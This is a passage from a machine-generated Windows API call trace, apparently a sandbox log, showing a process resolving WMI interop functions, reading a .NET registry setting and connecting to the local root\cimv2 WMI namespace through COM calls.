lpWideCharStr="Put", cchWideChar=3, lpMultiByteStr=0x1af9e350, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Put\x02", lpUsedDefaultChar=0x0) returned 3 [0198.896] GetProcAddress (hModule=0x7fffad180000, lpProcName="Put") returned 0x7fffad183c10 [0198.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Delete", cchWideChar=6, lpMultiByteStr=0x1af9e350, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Delete", lpUsedDefaultChar=0x0) returned 6 [0198.925] GetProcAddress (hModule=0x7fffad180000, lpProcName="Delete") returned 0x7fffad182ff0 [0199.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetNames", cchWideChar=8, lpMultiByteStr=0x1af9e350, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNames\x90\x81n§ÿ\x7f", lpUsedDefaultChar=0x0) returned 8 [0199.002] GetProcAddress (hModule=0x7fffad180000, lpProcName="GetNames") returned 0x7fffad1837f0 [0199.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginEnumeration", cchWideChar=16, lpMultiByteStr=0x1af9e340, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginEnumerationà½\x1e\x02", lpUsedDefaultChar=0x0) returned 16 [0199.085] GetProcAddress (hModule=0x7fffad180000, lpProcName="BeginEnumeration") returned 0x7fffad1827b0 [0199.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Next", cchWideChar=4, lpMultiByteStr=0x1af9e350, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Next", lpUsedDefaultChar=0x0) returned 4 [0199.096] GetProcAddress (hModule=0x7fffad180000, lpProcName="Next") returned 0x7fffad183b30 [0199.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndEnumeration", cchWideChar=14, lpMultiByteStr=0x1af9e350, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndEnumeration", lpUsedDefaultChar=0x0) returned 14 [0199.180] GetProcAddress (hModule=0x7fffad180000, lpProcName="EndEnumeration") returned 0x7fffad183150 [0199.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyQualifierSet", cchWideChar=23, lpMultiByteStr=0x1af9e340, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyQualifierSet", lpUsedDefaultChar=0x0) returned 23 [0199.191] GetProcAddress (hModule=0x7fffad180000, lpProcName="GetPropertyQualifierSet") returned 0x7fffad1839e0 [0199.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x1af9e350, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone", lpUsedDefaultChar=0x0) returned 5 [0199.216] GetProcAddress (hModule=0x7fffad180000, lpProcName="Clone") returned 0x7fffad1829c0 [0199.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetObjectText", cchWideChar=13, lpMultiByteStr=0x1af9e350, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetObjectText\x7f", lpUsedDefaultChar=0x0) returned 13 [0199.216] GetProcAddress (hModule=0x7fffad180000, lpProcName="GetObjectText") returned 0x7fffad183860 [0199.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnDerivedClass", cchWideChar=17, lpMultiByteStr=0x1af9e340, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnDerivedClassÀ\x1e\x02", lpUsedDefaultChar=0x0) returned 17 [0199.246] GetProcAddress (hModule=0x7fffad180000, lpProcName="SpawnDerivedClass") returned 0x7fffad184420 [0199.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnInstance", cchWideChar=13, lpMultiByteStr=0x1af9e350, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnInstance\x7f", lpUsedDefaultChar=0x0) returned 13 [0199.374] GetProcAddress (hModule=0x7fffad180000, lpProcName="SpawnInstance") returned 0x7fffad184480 [0199.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CompareTo", cchWideChar=9, lpMultiByteStr=0x1af9e350, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CompareTo\x81n§ÿ\x7f", lpUsedDefaultChar=0x0) returned 9 [0199.376] GetProcAddress (hModule=0x7fffad180000, lpProcName="CompareTo") returned 0x7fffad182b30 [0199.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyOrigin", cchWideChar=17, lpMultiByteStr=0x1af9e340, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyOriginÁ\x1e\x02", lpUsedDefaultChar=0x0) returned 17 [0199.387] GetProcAddress (hModule=0x7fffad180000, lpProcName="GetPropertyOrigin") returned 0x7fffad183980 [0199.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InheritsFrom", cchWideChar=12, lpMultiByteStr=0x1af9e350, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InheritsFromÿ\x7f", lpUsedDefaultChar=0x0) returned 12 [0199.504] GetProcAddress (hModule=0x7fffad180000, lpProcName="InheritsFrom") returned 0x7fffad183a80 [0199.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethod", cchWideChar=9, lpMultiByteStr=0x1af9e350, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethod\x81n§ÿ\x7f", lpUsedDefaultChar=0x0) returned 9 [0199.506] GetProcAddress (hModule=0x7fffad180000, lpProcName="GetMethod") returned 0x7fffad1836c0 [0199.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutMethod", cchWideChar=9, lpMultiByteStr=0x1af9e350, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutMethod\x81n§ÿ\x7f", lpUsedDefaultChar=0x0) returned 9 [0199.522] GetProcAddress (hModule=0x7fffad180000, lpProcName="PutMethod") returned 0x7fffad183f30 [0199.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DeleteMethod", cchWideChar=12, lpMultiByteStr=0x1af9e350, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeleteMethodÿ\x7f", lpUsedDefaultChar=0x0) returned 12 [0199.538] GetProcAddress (hModule=0x7fffad180000, lpProcName="DeleteMethod") returned 0x7fffad183030 [0199.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginMethodEnumeration", cchWideChar=22, lpMultiByteStr=0x1af9e340, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginMethodEnumeration", lpUsedDefaultChar=0x0) returned 22 [0199.539] GetProcAddress (hModule=0x7fffad180000, lpProcName="BeginMethodEnumeration") returned 0x7fffad1827f0 [0199.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NextMethod", cchWideChar=10, lpMultiByteStr=0x1af9e350, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextMethodn§ÿ\x7f", lpUsedDefaultChar=0x0) returned 10 [0199.541] GetProcAddress (hModule=0x7fffad180000, lpProcName="NextMethod") returned 0x7fffad183ba0 [0199.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndMethodEnumeration", cchWideChar=20, lpMultiByteStr=0x1af9e340, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndMethodEnumeration", lpUsedDefaultChar=0x0) returned 20 [0199.697] GetProcAddress (hModule=0x7fffad180000, lpProcName="EndMethodEnumeration") returned 0x7fffad183180 [0199.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodQualifierSet", cchWideChar=21, lpMultiByteStr=0x1af9e340, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodQualifierSet", lpUsedDefaultChar=0x0) returned 21 [0199.699] GetProcAddress (hModule=0x7fffad180000, lpProcName="GetMethodQualifierSet") returned 0x7fffad183790 [0199.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodOrigin", cchWideChar=15, lpMultiByteStr=0x1af9e340, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodOrigin", lpUsedDefaultChar=0x0) returned 15 [0199.701] GetProcAddress (hModule=0x7fffad180000, lpProcName="GetMethodOrigin") returned 0x7fffad183730 [0199.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Get", cchWideChar=16, lpMultiByteStr=0x1af9e340, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Get¨Æ\x1e\x02", lpUsedDefaultChar=0x0) returned 16 [0199.703] GetProcAddress (hModule=0x7fffad180000, lpProcName="QualifierSet_Get") returned 0x7fffad184050 [0199.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Put", cchWideChar=16, lpMultiByteStr=0x1af9e340, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Put Ç\x1e\x02", lpUsedDefaultChar=0x0) returned 16 [0199.810] GetProcAddress (hModule=0x7fffad180000, lpProcName="QualifierSet_Put") returned 0x7fffad184180 [0199.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Delete", cchWideChar=19, lpMultiByteStr=0x1af9e340, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Delete\x02", lpUsedDefaultChar=0x0) returned 19 [0199.974] GetProcAddress (hModule=0x7fffad180000, lpProcName="QualifierSet_Delete") returned 0x7fffad183fe0 [0199.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_GetNames", cchWideChar=21, lpMultiByteStr=0x1af9e340, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_GetNames", lpUsedDefaultChar=0x0) returned 21 [0199.975] GetProcAddress (hModule=0x7fffad180000, lpProcName="QualifierSet_GetNames") returned 0x7fffad1840c0 [0200.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_BeginEnumeration", cchWideChar=29, lpMultiByteStr=0x1af9e340, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_BeginEnumeration\x7f", lpUsedDefaultChar=0x0) returned 29 [0200.006] GetProcAddress (hModule=0x7fffad180000, lpProcName="QualifierSet_BeginEnumeration") returned 0x7fffad183fa0 [0200.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Next", cchWideChar=17, lpMultiByteStr=0x1af9e340, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_NextÉ\x1e\x02", lpUsedDefaultChar=0x0) returned 17 [0200.008] GetProcAddress (hModule=0x7fffad180000, lpProcName="QualifierSet_Next") returned 0x7fffad184120 [0200.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_EndEnumeration", cchWideChar=27, lpMultiByteStr=0x1af9e340, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_EndEnumeration§ÿ\x7f", lpUsedDefaultChar=0x0) returned 27 [0200.145] GetProcAddress (hModule=0x7fffad180000, lpProcName="QualifierSet_EndEnumeration") returned 0x7fffad184020 [0200.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetCurrentApartmentType", cchWideChar=23, lpMultiByteStr=0x1af9e340, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentApartmentType", lpUsedDefaultChar=0x0) returned 23 [0200.147] GetProcAddress (hModule=0x7fffad180000, lpProcName="GetCurrentApartmentType") returned 0x7fffad183a40 [0200.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDemultiplexedStub", cchWideChar=20, lpMultiByteStr=0x1af9e340, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDemultiplexedStub", lpUsedDefaultChar=0x0) returned 20 [0200.157] GetProcAddress (hModule=0x7fffad180000, lpProcName="GetDemultiplexedStub") returned 0x7fffad1834f0 [0200.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateInstanceEnumWmi", cchWideChar=21, lpMultiByteStr=0x1af9e340, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateInstanceEnumWmi", lpUsedDefaultChar=0x0) returned 21 [0200.347] GetProcAddress (hModule=0x7fffad180000, lpProcName="CreateInstanceEnumWmi") returned 0x7fffad182ea0 [0200.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateClassEnumWmi", cchWideChar=18, lpMultiByteStr=0x1af9e340, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateClassEnumWmi\x1e\x02", lpUsedDefaultChar=0x0) returned 18 [0200.561] GetProcAddress (hModule=0x7fffad180000, lpProcName="CreateClassEnumWmi") returned 0x7fffad182d50 [0200.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecQueryWmi", cchWideChar=12, lpMultiByteStr=0x1af9e350, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecQueryWmiÿ\x7f", lpUsedDefaultChar=0x0) returned 12 [0200.563] GetProcAddress (hModule=0x7fffad180000, lpProcName="ExecQueryWmi") returned 0x7fffad183320 [0200.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecNotificationQueryWmi", cchWideChar=24, lpMultiByteStr=0x1af9e340, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecNotificationQueryWmi\x90\x81n§ÿ\x7f", lpUsedDefaultChar=0x0) returned 24 [0200.807] GetProcAddress (hModule=0x7fffad180000, lpProcName="ExecNotificationQueryWmi") returned 0x7fffad1831c0 [0200.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutInstanceWmi", cchWideChar=14, lpMultiByteStr=0x1af9e350, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutInstanceWmi", lpUsedDefaultChar=0x0) returned 14 [0200.810] GetProcAddress (hModule=0x7fffad180000, lpProcName="PutInstanceWmi") returned 0x7fffad183dd0 [0200.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutClassWmi", cchWideChar=11, lpMultiByteStr=0x1af9e350, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutClassWmi§ÿ\x7f", lpUsedDefaultChar=0x0) returned 11 [0200.926] GetProcAddress (hModule=0x7fffad180000, lpProcName="PutClassWmi") returned 0x7fffad183c70 [0200.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloneEnumWbemClassObject", cchWideChar=24, lpMultiByteStr=0x1af9e340, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloneEnumWbemClassObject\x90\x81n§ÿ\x7f", lpUsedDefaultChar=0x0) returned 24 [0200.981] GetProcAddress (hModule=0x7fffad180000, lpProcName="CloneEnumWbemClassObject") returned 0x7fffad182a00 [0201.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ConnectServerWmi", cchWideChar=16, lpMultiByteStr=0x1af9e340, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ConnectServerWmi(Î\x1e\x02", lpUsedDefaultChar=0x0) returned 16 [0201.092] GetProcAddress (hModule=0x7fffad180000, lpProcName="ConnectServerWmi") returned 0x7fffad182b90 [0201.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetErrorInfo", cchWideChar=12, lpMultiByteStr=0x1af9e350, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetErrorInfoÿ\x7f", lpUsedDefaultChar=0x0) returned 12 [0201.262] GetProcAddress (hModule=0x7fffad180000, lpProcName="GetErrorInfo") returned 0x7fffad183590 [0201.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Initialize", cchWideChar=10, lpMultiByteStr=0x1af9e350, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Initializen§ÿ\x7f", lpUsedDefaultChar=0x0) returned 10 [0201.272] GetProcAddress (hModule=0x7fffad180000, lpProcName="Initialize") returned 0x7fffad183ad0 [0201.298] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af9e2a8 | out: phkResult=0x1af9e2a8*=0x3ac) returned 0x0 [0201.300] RegQueryValueExW (in: hKey=0x3ac, lpValueName="WMIDisableCOMSecurity", lpReserved=0x0, lpType=0x1af9e2e8, lpData=0x0, lpcbData=0x1af9e2e0*=0x0 | out: lpType=0x1af9e2e8*=0x0, lpData=0x0, lpcbData=0x1af9e2e0*=0x0) returned 0x2 [0201.301] RegCloseKey (hKey=0x3ac) returned 0x0 [0201.352] CoCreateInstance (in: rclsid=0x7fffad19b060*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fffad19b0c0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1af9f170 | out: ppv=0x1af9f170*=0x65d140) returned 0x0 [0201.353] WbemLocator:IWbemLocator:ConnectServer (in: This=0x65d140, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1af9f2d8 | out: ppNamespace=0x1af9f2d8*=0x66e960) returned 0x0 [0202.616] WbemLocator:IUnknown:QueryInterface (in: This=0x66e960, riid=0x7fffad19aee0*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1af9efe8 | out: ppvObject=0x1af9efe8*=0x677048) returned 0x0 [0202.617] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x677048, pProxy=0x66e960, pAuthnSvc=0x1af9f0b0, pAuthzSvc=0x1af9f030, pServerPrincName=0x1af9f060, pAuthnLevel=0x1af9f034, pImpLevel=0x1af9f03c, pAuthInfo=0x1af9f068, pCapabilites=0x1af9f038 | out: pAuthnSvc=0x1af9f0b0*=0xa, pAuthzSvc=0x1af9f030*=0x0, pServerPrincName=0x1af9f060, pAuthnLevel=0x1af9f034*=0x6, pImpLevel=0x1af9f03c*=0x2, pAuthInfo=0x1af9f068, pCapabilites=0x1af9f038*=0x1) returned 0x0 [0202.617] WbemLocator:IUnknown:Release (This=0x677048) returned 0x1 [0202.617] WbemLocator:IUnknown:QueryInterface (in: This=0x66e960, riid=0x7fffad19aed0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1af9ef80 | out: ppvObject=0x1af9ef80*=0x677090) returned 0x0 [0202.617] WbemLocator:IUnknown:QueryInterface (in: This=0x66e960, riid=0x7fffad19aee0*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1af9ef90 | out: ppvObject=0x1af9ef90*=0x677048) returned 0x0 [0202.617] WbemLocator:IClientSecurity:SetBlanket (This=0x677048, pProxy=0x66e960, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0202.617] WbemLocator:IUnknown:Release (This=0x677048) returned 0x2 [0202.617] WbemLocator:IUnknown:Release (This=0x677090) returned 0x1 [0202.617] CoTaskMemFree (pv=0x665fa0) [0202.617] WbemLocator:IUnknown:AddRef (This=0x66e960) returned 0x2 [0202.617] WbemLocator:IUnknown:Release (This=0x65d140) returned 0x0 [0202.618] CoGetContextToken (in: pToken=0x1af9e1f0 | out: pToken=0x1af9e1f0) returned 0x0 [0202.618] CoGetContextToken (in: pToken=0x1af9e670 | out: pToken=0x1af9e670) returned 0x0 [0202.618] WbemLocator:IUnknown:QueryInterface (in: This=0x66e960, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1af9e5f0 | out: ppvObject=0x1af9e5f0*=0x677058) returned 0x0 [0202.619] WbemLocator:IRpcOptions:Query (in: This=0x677058, pPrx=0x67c650, dwProperty=2, pdwValue=0x1af9e720 | out: pdwValue=0x1af9e720) returned 0x80004002 [0202.619] WbemLocator:IUnknown:Release (This=0x677058) returned 0x2 [0202.619] CoGetContextToken (in: pToken=0x1af9ed40 | out: pToken=0x1af9ed40) returned 0x0 [0202.619] CoGetContextToken (in: pToken=0x1af9ec40 | out: pToken=0x1af9ec40) returned 0x0 [0202.619] WbemLocator:IUnknown:QueryInterface (in: This=0x66e960, riid=0x1af9eda0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1af9ebc0 | out: ppvObject=0x1af9ebc0*=0x66e960) returned 0x0 [0202.619] WbemLocator:IUnknown:Release (This=0x66e960) returned 0x2 [0202.629] SysStringLen (param_1=0x0) returned 0x0 [0202.630] CoUninitialize () Thread: id = 199 os_tid = 0xf88 [0202.805] CoGetContextToken (in: pToken=0x1af9ebf0 | out: pToken=0x1af9ebf0) returned 0x0 [0202.805] CoGetContextToken (in: pToken=0x1af9ebc0 | out: pToken=0x1af9ebc0) returned 0x0 [0202.806] CoGetMarshalSizeMax (in: pulSize=0x1af9eba0, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x67c650, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0 | out: pulSize=0x1af9eba0) returned 0x0 [0202.807] CoMarshalInterface (pStm=0x665b50, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x67c650, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0202.813] WbemLocator:IUnknown:QueryInterface (in: This=0x66e960, riid=0x6547b0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1af9e900 | out: ppvObject=0x1af9e900*=0x66e960) returned 0x0 [0202.813] WbemLocator:IUnknown:QueryInterface (in: This=0x66e960, riid=0x7fffb48d5410*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1af9e810 | out: ppvObject=0x1af9e810*=0x66e960) returned 0x0 [0202.813] WbemLocator:IUnknown:QueryInterface (in: This=0x66e960, riid=0x7fffb48d5410*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1af9e640 | out: ppvObject=0x1af9e640*=0x66e960) returned 0x0 [0207.871] CoGetContextToken (in: pToken=0x1af9ebf0 | out: pToken=0x1af9ebf0) returned 0x0 [0207.871] CoGetContextToken (in: pToken=0x1af9ebc0 | out: pToken=0x1af9ebc0) returned 0x0 [0207.871] CoGetMarshalSizeMax (in: pulSize=0x1af9eba0, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x65d140, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0 | out: pulSize=0x1af9eba0) returned 0x0 [0207.871] CoMarshalInterface (pStm=0x666360, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x65d140, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0207.877] WbemLocator:IUnknown:QueryInterface (in: This=0x66e600, riid=0x6548a0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1af9e900 | out: ppvObject=0x1af9e900*=0x66e600) returned 0x0 [0207.878] WbemLocator:IUnknown:QueryInterface (in: This=0x66e600, riid=0x7fffb48d5410*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1af9e810 | out: ppvObject=0x1af9e810*=0x66e600) returned 0x0 [0207.878] WbemLocator:IUnknown:QueryInterface (in: This=0x66e600, riid=0x7fffb48d5410*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1af9e640 | out: ppvObject=0x1af9e640*=0x66e600) returned 0x0 Thread: id = 200 os_tid = 0xe40 [0206.549] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0206.549] RoInitialize () returned 0x1 [0206.549] RoUninitialize () returned 0x0 [0206.550] CoGetClassObject (in: rclsid=0x66a018*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fffa7d19540*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1b19e9d0 | out: ppv=0x1b19e9d0*=0x67c790) returned 0x0 [0206.551] WbemLocator:IUnknown:QueryInterface (in: This=0x67c790, riid=0x7fffa7d3e650*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1b19ea18 | out: ppvObject=0x1b19ea18*=0x0) returned 0x80004002 